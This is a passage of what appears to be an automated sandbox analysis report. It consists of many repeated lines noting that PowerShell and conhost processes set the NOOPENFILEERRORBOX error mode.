                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
